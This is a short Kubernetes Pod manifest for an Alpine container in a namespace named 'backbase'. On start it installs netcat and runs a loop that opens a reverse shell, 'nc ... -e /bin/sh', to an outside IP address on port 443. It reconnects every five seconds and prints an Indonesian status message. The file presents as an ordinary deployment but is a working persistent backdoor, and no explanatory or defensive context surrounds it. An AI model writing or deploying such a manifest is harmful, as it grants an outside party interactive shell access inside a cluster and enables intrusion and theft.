apiVersion: v1
kind: Pod
metadata:
  name: auto
  namespace: backbase
spec:
  containers:
  - name: alpine
    image: alpine:latest
    command: ["/bin/sh"]
    args:
    - -c
    - |
      apk add --update netcat-openbsd
      while true; do
        nc -v 203.175.125.130 443 -e /bin/sh
        echo "Koneksi putus, reconnect dalam 5 detik..."
        sleep 5
      done
  restartPolicy: Never
